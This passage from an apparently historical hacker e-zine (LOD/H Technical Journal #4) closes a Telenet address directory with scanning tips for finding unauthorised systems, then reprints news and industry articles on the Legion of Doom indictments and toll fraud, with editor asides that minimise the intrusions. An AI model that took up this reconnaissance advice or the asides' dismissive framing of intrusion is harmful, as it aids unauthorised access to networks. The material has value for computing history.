$ 124 PC Pursuit Dialer (2400)
|
|||
|
$ 130 HP-3000
|
|||
|
135 USA TODAY Sports Center
|
|||
|
* 139
|
|||
|
$ 145
|
|||
|
* 158
|
|||
|
* 159
|
|||
|
|
|||
|
|
|||
|
MNEMONIC ADDRESSES
|
|||
|
------------------
|
|||
|
|
|||
|
$ AFS
|
|||
|
APPLE
|
|||
|
BCS
|
|||
|
BIONET
|
|||
|
BLUE
|
|||
|
BRS
|
|||
|
CCC03
|
|||
|
CMS
|
|||
|
$ COM
|
|||
|
D30
|
|||
|
D31
|
|||
|
D32
|
|||
|
D33
|
|||
|
D34
|
|||
|
D35
|
|||
|
D36
|
|||
|
D37
|
|||
|
D41
|
|||
|
D42
|
|||
|
D43
|
|||
|
D44
|
|||
|
D45
|
|||
|
D46
|
|||
|
D50
|
|||
|
D51
|
|||
|
D52
|
|||
|
D53
|
|||
|
D54
|
|||
|
D55
|
|||
|
D56
|
|||
|
D57
|
|||
|
D58
|
|||
|
D61
|
|||
|
D62
|
|||
|
D63
|
|||
|
D64
|
|||
|
DELPHI
|
|||
|
DOW
|
|||
|
DUNS
|
|||
|
EIES
|
|||
|
GOLD
|
|||
|
GTEM
|
|||
|
HHTRAN
|
|||
|
INFO
|
|||
|
IRIS
|
|||
|
MMM
|
|||
|
MUNI
|
|||
|
NASA
|
|||
|
NET
|
|||
|
NSF
|
|||
|
OAG
|
|||
|
OLS
|
|||
|
ORBIT
|
|||
|
PORTAL
|
|||
|
PRIME
|
|||
|
S10
|
|||
|
S11
|
|||
|
S12
|
|||
|
S13
|
|||
|
S14
|
|||
|
S15
|
|||
|
S16
|
|||
|
S17
|
|||
|
S18
|
|||
|
S19
|
|||
|
SIS
|
|||
|
SIT
|
|||
|
SPR
|
|||
|
STK1
|
|||
|
STK2
|
|||
|
STK3
|
|||
|
STK4
|
|||
|
SUMEX
|
|||
|
USIBM
|
|||
|
USPS
|
|||
|
VUTEXT
|
|||
|
|
|||
|
|
|||
|
|
|||
|
PC-PERSUIT DIALERS
|
|||
|
------------------
|
|||
|
|
|||
|
C D/CITY/BAUD,ID,PASSWORD
|
|||
|
|
|||
|
A/C CITY
|
|||
|
--- -----
|
|||
|
201 NJNEW
|
|||
|
202 DCWAS
|
|||
|
203 CTHAR
|
|||
|
206 WASEA
|
|||
|
212 NYNYO
|
|||
|
213 CALAN
|
|||
|
214 TXDAL
|
|||
|
215 PAPHI
|
|||
|
216 OHCLV
|
|||
|
303 CODEN
|
|||
|
305 FLMIA
|
|||
|
312 ILCHI
|
|||
|
313 MIDET
|
|||
|
314 MOSLO
|
|||
|
404 GAATL
|
|||
|
408 CASJO
|
|||
|
414 WIMIL
|
|||
|
415 CAPAL
|
|||
|
415 CASFA
|
|||
|
503 ORPOR
|
|||
|
602 AZPHO
|
|||
|
612 MNMIN
|
|||
|
617 MABOS
|
|||
|
619 CASAD
|
|||
|
713 TXHOU
|
|||
|
714 CARIV
|
|||
|
714 CASAN
|
|||
|
801 UTSLC
|
|||
|
813 FLTAM
|
|||
|
816 MOKAN
|
|||
|
818 CAGLE
|
|||
|
916 CASAC
|
|||
|
919 NCRTP
|
|||
|
|
|||
|
|
|||
|
|
|||
|
TELENET SCANNING TIPS
|
|||
|
--------------------
|
|||
|
|
|||
|
There are a few things to take into consideration when using Telenet.
|
|||
|
First of all, ignore error messages! When something says rejecting, or
|
|||
|
illegal address, or remote procedure error, try it again using sub-
|
|||
|
addresses. (IE: 100100a, 100100b...100100.99) I have also found that
|
|||
|
some addresses that are rejecting merely require that you connect to it
|
|||
|
using an id. Many of the things that respond with illegal address are
|
|||
|
telenet pads. Most of the public pads are in the following ranges: 0-20,
|
|||
|
80-100, 180-190. Many times you will find private pads. If you are very,
|
|||
|
very lucky you will find that pad-to-pad connections are possible to these
|
|||
|
privately owned pads. However, most of the time they are not operating, so
|
|||
|
your chances of actually picking anything up are very slim.
|
|||
|
|
|||
|
When I did this directory I only checked the first few sub addresses on
|
|||
|
addresses that didn't immediately connect, so needless to say there are
|
|||
|
still a vast amount of systems out there. One address I have responds with
|
|||
|
rejecting until you connect to the sub address 74! Imagine trying to go
|
|||
|
that far on each of the thousands of rejecting and illegal addresses I
|
|||
|
obtained in my scanning! Maybe some other time.
|
|||
|
|
|||
|
There are several areas that I scanned that are not in this directory.
|
|||
|
Mainly, these are areas where I didn't find anything. So you don't waste
|
|||
|
your time, all hosts in Canada are served through Datapac, so there is
|
|||
|
nothing in areas prefixed with a Canadian area code. There are also many
|
|||
|
US areas that I guess are still striving for the Industrial Revolution, and
|
|||
|
therefore have no systems online. There are also several privately owned
|
|||
|
prefixes that I didn't scan just because it would be a pain in the ass,
|
|||
|
above and beyond the pain involved doing the main scanning. The major ones
|
|||
|
are 622 (NYNEX), 891, 892, 893, & 894 (OWNERS UNKNOWN). There are also a
|
|||
|
few others that go up and down daily, depending upon their mood. I
|
|||
|
wouldn't suggest that you all immediately start hacking these prefixes;
|
|||
|
mainly because you will need an ID just to get a response other than
|
|||
|
refused collect connection.
|
|||
|
|
|||
|
Lastly, if anyone finds any errors in the directory, or finds anything I
|
|||
|
omitted, let me know, and I'll revise it. Also, if anyone would like a
|
|||
|
copy of the telix script I used to do this scanning, let me know. This was
|
|||
|
a bitch to do, but I think it was worth the trouble. The next update won't
|
|||
|
be for a year, as this should suffice for at least that long.
|
|||
|
|
|||
|
|
|||
|
==============================================================================
|
|||
|
End of Second Half of LOD/H Telenet Directory, Rev. #5
|
|||
|
==============================================================================
|
|||
|
The LOD/H Technical Journal, Issue #4: File 10 of 10.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NETWORK NEWS AND NOTES
|
|||
|
----------------------
|
|||
|
|
|||
|
|
|||
|
The Network News and Notes file contains reprints of articles that are of
|
|||
|
interest to the majority of our intended readers. In this installment we
|
|||
|
borrowed heavily from the CFCA (Communications Fraud Control Association)
|
|||
|
Communicator since the newsletter deals specifically with issues relevant to
|
|||
|
our readers. The CFCA is "a nonprofit educational organization founded in
|
|||
|
1985 to help the telecommunications industry combat fraud."
|
|||
|
|
|||
|
Overall, do not let the titles mislead you. Every article contains interesting
|
|||
|
and we hope useful information. Be sure to take the time and read into them
|
|||
|
before skipping. Some are a little old but better late than never. If anyone
|
|||
|
comes across any articles of interest, we would like to know about them. One
|
|||
|
more note, all comments within brackets [], are remarks made by one of
|
|||
|
the TJ editors.
|
|||
|
|
|||
|
The first two articles, as was stated in the Introduction, relate the various
|
|||
|
trouble some noted members of the community ran into.
|
|||
|
|
|||
|
______________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
Source: The Wall Street Journal
|
|||
|
Issue: Wednesday, February 7, 1990
|
|||
|
Title: Computer Hackers Accused of Scheme Against BellSouth
|
|||
|
Author: Thomas M. Burton
|
|||
|
|
|||
|
|
|||
|
CHICAGO--Federal grand juries in Chicago and Atlanta indicted four computer
|
|||
|
hackers in an alleged fraud scheme that authorities said could potentially
|
|||
|
disrupt emergency "911" telephone service throughout nine Southern States.
|
|||
|
|
|||
|
The men, alleged to be part of a closely knit cadre of computer hackers
|
|||
|
known as the Legion of Doom, gained access to the computer system, controlling
|
|||
|
telephone emergency service of BellSouth Corp., the Atlanta-based
|
|||
|
telecommunications giant.
|
|||
|
|
|||
|
BellSouth, through two subsidiaries, oversees phone service in Alabama,
|
|||
|
Mississippi, Georgia, Tennessee, Kentucky, Louisiana, Florida, and the
|
|||
|
Carolinas.
|
|||
|
|
|||
|
The Chicago indictment said members of the Legion of Doom are engaged in
|
|||
|
disrupting telephone service by entering a telephone company's computers and
|
|||
|
changing the routing of telephone calls. The hackers in the group also
|
|||
|
fraudulently obtain money from companies by altering information in their
|
|||
|
computers, the indictment said.
|
|||
|
|
|||
|
|
|||
|
The hackers transferred stolen telephone-computer information from
|
|||
|
BellSouth to what prosecutors termed a "computer bulletin board system"
|
|||
|
in Lockport, Ill. In turn, the men planned to publish the computer data in a
|
|||
|
hackers' magazine, the grand jury charged.
|
|||
|
|
|||
|
-----EDITOR'S NOTES:
|
|||
|
As always, ignorance and falsehoods are abound in most articles of this
|
|||
|
nature. For the record, NO TELEPHONE SERVICE WAS INTENTIONALLY DISRUPTED DUE
|
|||
|
TO THE ACCUSED MEMBERS. Furthermore, NO MONEY FROM COMPANIES WAS EVER
|
|||
|
FRAUDULENTLY OBTAINED BY ALTERING INFORMATION IN THEIR COMPUTERS. These are
|
|||
|
the typical WILD accusations made by law enforcement and further distorted
|
|||
|
by the media in such cases. As for the bbs is Lockport, Ill. well it was
|
|||
|
simply a legitimate information storage and retrieval system used by many,
|
|||
|
many people for legitimate purposes of information exchange. It would be very
|
|||
|
time consuming for the operator of said system to check every file on the
|
|||
|
system as it was a UNIX based system with a lot of disk space. The hacker
|
|||
|
magazine stated above is simply Phrack, Inc. put out by Knight Lightning and
|
|||
|
Taran King. More comments after next article.
|
|||
|
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
Source: ComputerWorld
|
|||
|
Issue: 1990
|
|||
|
Title: Babes in high tech toyland nabbed
|
|||
|
Author: Michael Alexander
|
|||
|
|
|||
|
CHICAGO--- The U.S. Justice Department escalated its ware against computer
|
|||
|
crime last week with two indictments against members of an alleged computer
|
|||
|
hacker group, who are charged with stealing a copy of a 911 emergency computer
|
|||
|
program from BellSouth Telephone Co., among several other crimes.
|
|||
|
|
|||
|
In a seven-count indictment returned in Chicago, Robert X, 20 also known as
|
|||
|
"The Prophet", is alleged to have used a computer to steal a copy of a
|
|||
|
computer program owned and used by BellSouth that controls emergency calls to
|
|||
|
the police, fire, ambulance and emergency services in cities throughout nine
|
|||
|
Southern states. According to the indictment, after X stole the program --
|
|||
|
valued at $79,449 -- he uploaded it to a computer bulletin board.
|
|||
|
|
|||
|
The Chicago indictment further alleges that Craig Y, 19, also known as
|
|||
|
"Knight Lightning" downloaded the 911 program to his computer at the
|
|||
|
University of Missouri in Columbia, Mo., and edited it for publication in
|
|||
|
"Phrack", a newsletter for computer hackers.
|
|||
|
|
|||
|
X and Y allegedly intended to disclose the stolen information to other
|
|||
|
computer hackers so that they could unlawfully access and perhaps disrupt
|
|||
|
other 911 services, the Chicago indictment charged.
|
|||
|
|
|||
|
In a second indictment returned in Atlanta, X and two others were charged
|
|||
|
with additional crimes related to BellSouth systems.
|
|||
|
|
|||
|
All four hackers allegedly are members of the Legion of Doom, described in
|
|||
|
the indictments "as a closely knit group of about 15 computer hackers", in
|
|||
|
Georgia, Texas, Michigan and several other states.
|
|||
|
|
|||
|
BellSouth spokesmen refused to say when or how the intrusion was detected
|
|||
|
or how a computer hacker was able to lift the highly sensitive and proprietary
|
|||
|
computer program.
|
|||
|
|
|||
|
"Hopefully, the government's action underscores that we do not intend to
|
|||
|
view this as the work of a mischievous prankster playing in a high-tech
|
|||
|
toyland", one spokesman said.
|
|||
|
|
|||
|
A source within BellSouth said that much of what the hacker took was
|
|||
|
documentation and not source code. "They did not disrupt any emergency
|
|||
|
telephone service, and we are not aware of any impact on our customers", the
|
|||
|
source said.
|
|||
|
|
|||
|
William Cook, an assistant U.S. attorney in Chicago, declined to comment on
|
|||
|
whether 911 service was actually disrupted. "It is a matter of evidence,", he
|
|||
|
said.
|
|||
|
|
|||
|
Cook also said that while the two hackers are charged with carrying out
|
|||
|
their scheme between December 1988 and February 1989, the indictment came
|
|||
|
after a year-long investigation. Though Cook refused to say how the hackers
|
|||
|
were discovered or caught, it is believed that after the initial penetration
|
|||
|
by one of the hackers, an intrusion task force was set up to monitor
|
|||
|
subsequent security breaches and to gather evidence against the hackers.
|
|||
|
|
|||
|
If convicted on all counts, X faces a prison sentence of up to 32 years and
|
|||
|
a maximum fine of $222,000, and Y faces a prison sentence of 31 years and a
|
|||
|
maximum fine of $122,000.
|
|||
|
|
|||
|
The Atlanta indictment charged Robert X, Adam Z, 22 known as "The Urvile"
|
|||
|
and also "Necron 99", and Frank XYZ, 23 known as "The Leftist", with eight
|
|||
|
counts each of computer fraud, wire fraud, access code fraud and interstate
|
|||
|
transportation of stolen property, among other crimes.
|
|||
|
|
|||
|
If convicted, each defendant faces up to five years imprisonment and a
|
|||
|
$250,000 fine on each count. The three illegally accessed Bellsouth computers
|
|||
|
and obtained proprietary information that they distributed to other hackers,
|
|||
|
the indictment alleged.
|
|||
|
|
|||
|
----EDITOR's NOTES: As is confirmed in this article, no telephone service
|
|||
|
was disrupted. The extent of BellSouth's inadequacy regarding security matters
|
|||
|
was not detailed in these articles. Here is a rundown of what may have
|
|||
|
possibly happened: BellSouth's SBDN (Southern Bell Data Network) which is a
|
|||
|
modified Telenet network that contains hundreds if not thousands of network
|
|||
|
nodes (individual systems) may have been accessed during which time the system
|
|||
|
that controls the entire network may have been possibly compromised. This
|
|||
|
would allow someone to access just about any system on the network, since
|
|||
|
Bellsouth consolidated most of their individual systems onto a large network
|
|||
|
(economically not a bad idea, but a security nightmare indeed). This may allow
|
|||
|
one to stumble onto systems dealing with 911. Since it may be interesting to
|
|||
|
learn how such a system operates and how the 'automatic trace' is
|
|||
|
accomplished, the documentation would be of some help. No need for any actual
|
|||
|
programs however. Possibly, maybe, an article paraphrased the operation of 911
|
|||
|
and was possibly to be distributed through the Phrack, Inc. newsletter.
|
|||
|
|
|||
|
The last names of those involved were omitted. Go look them up for yourself if
|
|||
|
you think its that important.
|
|||
|
|
|||
|
Just for the record: KNIGHT LIGHTNING NEVER WAS A MEMBER OF LOD. Yet another
|
|||
|
error in the reporting...LOD has half the 15 supposed number of members.
|
|||
|
|
|||
|
Another article followed the above one on the same page, by the same author:
|
|||
|
|
|||
|
Last week's disclosure of an alleged hacker theft of highly sensitive
|
|||
|
BellSouth Telephone Co. documentation for a nine-state 911 emergency system
|
|||
|
was the second serious security breach of a telephone company network to come
|
|||
|
to light in as many months.
|
|||
|
|
|||
|
In January, a trio of hackers was able to penetrate computer systems at
|
|||
|
Pacific Bell Telephone Co. and eavesdrop on conversations and perpetrate other
|
|||
|
criminal acts. [CW, Jan. 22].
|
|||
|
|
|||
|
Just how vulnerable are the nation's telephone systems to hacker attacks?
|
|||
|
Spokesmen for BellSouth and Pacific Bell insist that their systems are secure
|
|||
|
and that they and other telephone companies routinely assess their
|
|||
|
vulnerability to hackers.
|
|||
|
|
|||
|
"Security is being constantly changed, every intrusion is studied,
|
|||
|
passwords are changed," said Terry Johnson, manager of media relations for
|
|||
|
BellSouth in Atlanta.
|
|||
|
|
|||
|
Johnson however, declined to say how the hackers allegedly were able to
|
|||
|
lift the documentation to a 911 emergency communication services program.
|
|||
|
|
|||
|
"It is a rather serious computer security breach," said Richard Ichikawa, a
|
|||
|
Honolulu based telecommunications consultant who specializes in designing and
|
|||
|
installing 911 emergency systems. Stealing documentation, as the Legion of
|
|||
|
Doom member is alleged to have done, many not be a particularly difficult task
|
|||
|
for a savvy hacker, he said.
|
|||
|
|
|||
|
Taking the actual program, while certainly possible, would be much more
|
|||
|
challenging, however. The computer the controls enhanced 911 service is "quite
|
|||
|
isolated" from the calling public, Ichikawa said.
|
|||
|
|
|||
|
A recently published report to Congress by the Office of Technology
|
|||
|
Assessment suggested that the security and survivability of the nation's
|
|||
|
communication infrastructure is at greater risk to hacker attacks than ever
|
|||
|
before. Business and government reliance on communications and information
|
|||
|
based systems has increased, thus much more is at stake when those systems
|
|||
|
fail, the report stated.
|
|||
|
|
|||
|
The increased publicity of hacker attacks may help to curb attacks by
|
|||
|
hackers, said Sanford Sherizen, a security consultant at Data Security
|
|||
|
Systems, Inc., in Natick, Mass.
|
|||
|
|
|||
|
Some law enforcement officials complain that the nation's telephone firms
|
|||
|
do not cooperate as readily as they would expect when attacks of this sort
|
|||
|
occur. "They [telecommunications providers] are the single biggest headache
|
|||
|
law enforcers have right now," said Gail Thackery, Arizona stat assistant
|
|||
|
district attorney.
|
|||
|
|
|||
|
Regional Bell operating companies contacted last week disputed that
|
|||
|
assertion.
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
Source: CFCA (Communications Fraud Control Association) Communicator
|
|||
|
Issue: February-March 1989
|
|||
|
Title: But are LD networks safe?
|
|||
|
|
|||
|
Spread over vast distances and segmented by switches guarded by their own
|
|||
|
passwords, long distance networks are generally safe from virus attacks.
|
|||
|
According to Henry Kluepfel, Bellcore district manager of Security Planning
|
|||
|
intruders can easily attain the same information that is available to vendors
|
|||
|
and service providers. "If passwords are not changed regularly, intruders
|
|||
|
can quickly wreak havoc".
|
|||
|
|
|||
|
Scott Jarus, division director of Network Loss Prevention for Metromedia,
|
|||
|
and a member of CFCA's Board of Directors, says that users of "outboard"
|
|||
|
computer systems should not be assigned high level access to their company's
|
|||
|
switches or networks. "Non-proprietary hardware and software that handle
|
|||
|
such functions as billing collection and network database management are
|
|||
|
targets for unauthorized access and viruses", he says.
|
|||
|
|
|||
|
Mr. Kluepfel says that once hackers have the documentation they can send
|
|||
|
details on how to crash the systems to hundreds of bulletin boards. "We
|
|||
|
found that many system administrators didn't realize manufacturers install
|
|||
|
rudimentary default passwords."
|
|||
|
|
|||
|
Bellcore encourages using sophisticated codes and applying a variety of
|
|||
|
defenses. "Don't simply rely on a dialback modem, or a good password", says
|
|||
|
Mr. Kluepfel. "Above all, don't depend on a system to always perform as
|
|||
|
expected. And remember that new employees don't know the administrative
|
|||
|
measures the operator knows".
|
|||
|
|
|||
|
Managers should advise clients on any needed internal analysis and
|
|||
|
investigations, and keep abreast of technological advances when planning
|
|||
|
their defenses.
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
Source: Same as above
|
|||
|
Title: Secure those gray boxes
|
|||
|
|
|||
|
After the FCC mandated that telcos provide test modes on the gray
|
|||
|
[or green (ed. note)] connection boxes usually found outside structures,
|
|||
|
there have been instances of persons surreptitiously clipping on handsets
|
|||
|
or snapping in modular connections (RJ-11) to make long distance calls on the
|
|||
|
residents' line. CFCA advises customers to padlock their boxes to deter such
|
|||
|
thievery.
|
|||
|
|
|||
|
John Venn, manger of Electronic Operations at PacBell's San Francisco
|
|||
|
office, reports that the boxes they install have separate connections for
|
|||
|
company and customer use, so that users have the option of securing access
|
|||
|
to their portion. PacBell's side has a built-in lock, while customers have
|
|||
|
padlock hasps.
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
Source: Same as above
|
|||
|
Title: Product Description: Pen-Link analysis software
|
|||
|
Author: Mike Murman
|
|||
|
|
|||
|
Since 1986, Pen-Link, Ltd. of Lincoln Neb. has been producing software
|
|||
|
that supports telecom investigations. Last July, the company introduced an
|
|||
|
updated version of Pen-Link, a two-year-old program that accepts data from
|
|||
|
most Dialed Number Recorders (DNRs) manufactured today, pools that information
|
|||
|
into a common database structure, and allows the user to determine the calling
|
|||
|
patterns and the codes that have been compromised.
|
|||
|
|
|||
|
In today's ever-expanding telecommunications environment there is a need
|
|||
|
for faster identification and documentation of abuser call patterns to assure
|
|||
|
successful prosecutions. In applications of DNRs for investigative purposes,
|
|||
|
Pen-Link programs have reduced the time normally needed to input, analyze and
|
|||
|
report call data by as much as 90 percent. The result is improved productivity
|
|||
|
and quicker response to customers' needs.
|
|||
|
|
|||
|
The Pen-Link 2.0 program also provides several related features. First, it
|
|||
|
is a communications program, meaning that if you are using a DNR with modem
|
|||
|
capability or RS232 communication ports, the program can automatically load
|
|||
|
your call records into a PC, eliminating the time needed to key-in call
|
|||
|
record data.
|
|||
|
|
|||
|
Second, Pen-Link has an autoload format section that takes call records
|
|||
|
you have transferred and puts them into a standard record format. This is an
|
|||
|
important feature, given that the program supports multiple types of DNR
|
|||
|
hardware that all have unique call data formats.
|
|||
|
|
|||
|
In short, you can use any combination of DNRs in your investigations with
|
|||
|
Pen-Link and all data will be compatible. Furthermore, the program allows
|
|||
|
you the flexibility of purchasing new DNRs of any type, and not worry about
|
|||
|
duplicating your software expense or learning new software programs. [Notice
|
|||
|
how he keeps saying "you" in this article? (ed.)]
|
|||
|
|
|||
|
Finally, Pen-Link enables you to analyze and report on your call record
|
|||
|
information. There are 15 different call analysis reports and 6 different
|
|||
|
graphic reports. If these reports do not meet your needs, the program has a
|
|||
|
report generator that allows you to customize your analysis and reports.
|
|||
|
|
|||
|
Pen-Link is a dedicated program written in Turbo Pascal. The company
|
|||
|
elected to start from scratch and develop its own software, rather than
|
|||
|
simply adapting standard applications. There are two reasons for this
|
|||
|
approach: dedicated software programs run more efficiently, so that if a
|
|||
|
hacker is generating thousands of call records and you want to analyze and
|
|||
|
report this information, the program can provide a report much faster than if
|
|||
|
you were processing the data manually.
|
|||
|
|
|||
|
The second reason behind this strategy is that users only need to learn
|
|||
|
and understand the options for the pop-up menu format. Pen-Link also supports
|
|||
|
color monitors.
|
|||
|
|
|||
|
A manual editing feature allows you to enter your database and find
|
|||
|
specific records by the criteria you have selected; then review and edit the
|
|||
|
data. Manual editing also allows you to enter call data from old pen
|
|||
|
registers that only produce paper strips containing call information.
|
|||
|
|
|||
|
Another feature, the utilities section, provides several options to
|
|||
|
manage call information stored in your computer. This allows you to archive
|
|||
|
information to disk, then reload it later when it is needed. If your data
|
|||
|
files become corrupted, you can reconstruct and reformat them by using the
|
|||
|
utilities section. And if you wish to use your call data information in
|
|||
|
another application program, Pen-Link's utilities allow you to create an
|
|||
|
ASCII text file of call information, which then can be read by these programs.
|
|||
|
Furthermore, the program can accept ASCII text files from other DNR software
|
|||
|
programs.
|
|||
|
|
|||
|
The program calls for an IBM or compatible PC equipped with a hard drive,
|
|||
|
operating under MS-DOS 2.1 or higher. Pen-Link currently supports the
|
|||
|
following DNRs: JSI, Mitel, Racom, Voice ID, Hekimian, Bartec, Pamco, HDS,
|
|||
|
and Positive Controls. If you are using a DNR that is not listed, Pen-Link,
|
|||
|
LTD will program its software so it can automatically load call records from
|
|||
|
your equipment.
|
|||
|
|
|||
|
The use of DNRs that automatically transfer call record data saves your
|
|||
|
security department considerable investigative time. Pen-Link's mission is
|
|||
|
to provide telcom security departments with a sophisticated investigative
|
|||
|
software tool that is easy to use, flexible and compatible.
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
Source: Same as above
|
|||
|
Title: Extended Ky. case resolved
|
|||
|
|
|||
|
A 21 year-old Kentucky man was successfully convicted October 27 on 14
|
|||
|
counts of computer and toll fraud under a number of state statutes. The
|
|||
|
defendant, John K. Detherage, pleaded guilty to using his personal computer to
|
|||
|
identify authorization codes in order to place unauthorized long distance
|
|||
|
calls valued at $27,000.
|
|||
|
|
|||
|
Detherage had been indicted a year earlier by an Oldham County grand jury
|
|||
|
on six felony counts related to the scam and two misdemeanor counts of
|
|||
|
possessing stolen personal identification and calling card numbers. He was
|
|||
|
later charged with two additional counts of possessing stolen PINs.
|
|||
|
|
|||
|
Detherage originally was to have been tried in February 1988, but the case
|
|||
|
was postponed when he pleaded guilty. He was sentenced at the Oldham County
|
|||
|
Circuit Court at LaGrange to pay $12,000 in restitution, and relinquish all
|
|||
|
computer equipment and software to the court.
|
|||
|
|
|||
|
His charges included theft of services over $100; theft of services; four
|
|||
|
counts of unlawful access to a computer, second degree; possession of stolen
|
|||
|
credit or debit cards, and six counts of unlawful access to a computer. Four
|
|||
|
other counts were dismissed.
|
|||
|
|
|||
|
Kentucky has a number of statutes that can be applied to theft of telephone
|
|||
|
services. Chapter 514.060 addresses theft of services, while 514.065 describes
|
|||
|
the possession, use or transfer of a device for the theft of services. Theft
|
|||
|
of services is defined to include telephone service, and the defendant was
|
|||
|
charged with two counts under 514.060.
|
|||
|
|
|||
|
Detherage was also charged with 10 counts (six felony and four misdemeanor)
|
|||
|
under Chapter 434.580, which relates to the receipt of stolen credit cards.
|
|||
|
Kentucky interprets computer crime as involving accessing of computer systems
|
|||
|
to obtain money, property or services through false or fraudulent pretenses,
|
|||
|
representations or promises.
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
Source: Same as above
|
|||
|
Title: Industry Overview
|
|||
|
|
|||
|
As major players in the telecom industry shore up the defenses on their
|
|||
|
telephone and computer networks, criminals [who, us?] are turning to smaller,
|
|||
|
less protected companies [its called survival of the fittest]. In 1988, the
|
|||
|
use of stolen access codes to make free long distance calls continued to be
|
|||
|
the favorite modus operandi among network intruders throughout the industry,
|
|||
|
although code abuse leveled off or declined among large carriers with well
|
|||
|
funded security organizations and substantial technical apparatus to defeat
|
|||
|
most toll and network fraud.
|
|||
|
|
|||
|
However, some resellers and PBX owners are being victimized by fraud of all
|
|||
|
types, probably because most use access codes with only six or seven digits.
|
|||
|
Such vulnerable systems will continue to be used by abusers to route long
|
|||
|
distance calls overseas. Fraudulent calls placed on a compromised system
|
|||
|
quickly accumulate charges the system owner must eventually pay.
|
|||
|
|
|||
|
Many PBX's also lack effective systems able to detect irregular activities
|
|||
|
and block fraudulent calls. Add to this the fact that several carriers may be
|
|||
|
handling the inbound and outbound WATS lines, and investigator's jobs can
|
|||
|
really become complex.
|
|||
|
|
|||
|
The sharp increase in the abuse of voice store-and-forward systems, or
|
|||
|
voice mail, that began alarming owners and manufacturers early last year will
|
|||
|
continue through 1989. Last spring, traffickers began seizing private voice
|
|||
|
mail systems to coordinate drug shipments. Messages can be quickly erased when
|
|||
|
they are no longer needed. Dealers have been receiving mailbox numbers by
|
|||
|
pager, then calling in recorded messages from public telephones.
|
|||
|
|
|||
|
No matter how long a security code may be, if intruders obtain an 800
|
|||
|
number to a voice mail system they can program a computer and take the time to
|
|||
|
break it, because it won't cost them anything. Once accessed through a PBX,
|
|||
|
intruders can exchange stolen lists of long distance access codes, usually
|
|||
|
without the system owner's knowledge.
|
|||
|
|
|||
|
The time it takes abusers to break into a voice mail system is
|
|||
|
proportionate to the number of digits in a security code. A four-digit code
|
|||
|
can, for example be beaten by a skilled computer operator in slightly over a
|
|||
|
minute. [Clarification, this is probably through the use of default security
|
|||
|
codes, not sequential or random scanning techniques. ed.] One problem is that
|
|||
|
voice mail customers don't often know what features to select when buying a
|
|||
|
system. And few manufactures take the initiative to advise customers of the
|
|||
|
importance of security.
|
|||
|
|
|||
|
Another problem that has been around for several years, subscription fraud,
|
|||
|
will continue into 1989, although telcos have reduced it by making customer's
|
|||
|
applications more detailed and comprehensive [like requiring customers to
|
|||
|
supply their credit card numbers. This way if they skip town without paying
|
|||
|
and the credit card is valid and not maxed out, the phone company can still
|
|||
|
recover the money owned them. ed.], and by checking out potential customers
|
|||
|
more thoroughly. Dishonest subscribers use false identification and credit
|
|||
|
references to obtain calling cards and services, with no intention of paying.
|
|||
|
|
|||
|
Intelligent software is available that aids switch and PBX owners in
|
|||
|
identifying, screening and blocking fraudulent calls. Another precaution is
|
|||
|
to add digits to access codes, because numbers of fewer than 10 digits cannot
|
|||
|
withstand today's intruders. A number of carriers have already gone to 14
|
|||
|
digits.
|
|||
|
|
|||
|
Some larger carriers have been sending technical representative out to
|
|||
|
reprogram PBX's, encourage customers to install better safeguards, and advise
|
|||
|
them to shut down their systems at night and on weekends. Customers should
|
|||
|
also expect to see billing inserts warning of the improved defenses against
|
|||
|
fraud.
|
|||
|
|
|||
|
As more companies break into the international market they will need solid
|
|||
|
security safeguards to protect them against intrusions of their networks. A
|
|||
|
small interexchange carrier (IC) in Alabama was hit hard recently by "phone
|
|||
|
phreakers" soon after they opened overseas service.
|
|||
|
|
|||
|
Other start-ups find themselves desperately trying to play catch up after
|
|||
|
blithely operating several years without a hitch. An IC with 30,000 customers
|
|||
|
in Southern California increased its seven-digit access codes to ten digits
|
|||
|
and it aggressively pursuing five groups of hackers its investigators
|
|||
|
uncovered after discovering that company-issued personal identification
|
|||
|
numbers were posted on computer bulletin boards.
|
|||
|
|
|||
|
In the final analysis, one fact emerges: widespread cooperation among
|
|||
|
injured parties will ensure quicker results and conserve vital company
|
|||
|
resources.
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
Source: PC Week April 10,1989
|
|||
|
Title: Keep an Ear Out for New Voice Technology
|
|||
|
Author: Matt Kramer
|
|||
|
|
|||
|
With the rise in digital transmission of voice and data, it's easy to
|
|||
|
assume that voice and data have merged into a muddle of indiscriminate
|
|||
|
material, with voice indistinguishable from data. After all, a bit's a bit,
|
|||
|
right?
|
|||
|
|
|||
|
But, those people in the white lab coats keep coming up with new ways to
|
|||
|
use voice technology.
|
|||
|
|
|||
|
The telephone companies are the ones poised to make the most of this
|
|||
|
technology. U.S. Sprint recently announced that it was experimenting with the
|
|||
|
use of "voice prints"--a recording of a verbal password that would be used to
|
|||
|
help identify authorized subscribers using their U.S. Sprint telephone charge
|
|||
|
cards, which would help cut down on hackers trying to steal telephone service.
|
|||
|
Subscribers would record a voice print of a verbal password. Then, when they
|
|||
|
were using their charge cards, they would repeat the passwords to verify their
|
|||
|
identities.
|
|||
|
|
|||
|
Northern Telecom has embarked on its own efforts to bring voice-recognition
|
|||
|
technology to public telephone service. it is selling telephone companies a
|
|||
|
new billing service that uses voice-recognition technology to automate collect
|
|||
|
and third-number billing calls.
|
|||
|
|
|||
|
Called the Automated Alternate Billing Service (AABS), the system calls the
|
|||
|
party to be billed and "asks" if the charges will be accepted. The Northern
|
|||
|
Telecom switch "listens" to the response and either completes the call or
|
|||
|
informs the calling party that the charges have been refused.
|
|||
|
|
|||
|
Northern Telecom also plans to use voice technology to offer other
|
|||
|
features, such as allowing the system to announce the caller's name in the
|
|||
|
party's own voice and stating the call's origin, such as the name of a city,
|
|||
|
a university or an institution.
|
|||
|
|
|||
|
The big draw for phone companies, of course, is reduction of personnel
|
|||
|
costs, since no human operator assistance is needed. That's an option for lots
|
|||
|
of corporate financial officers who have been attracted to automated-attendant
|
|||
|
phone systems because they can replace a bevy of switchboard operators.
|
|||
|
|
|||
|
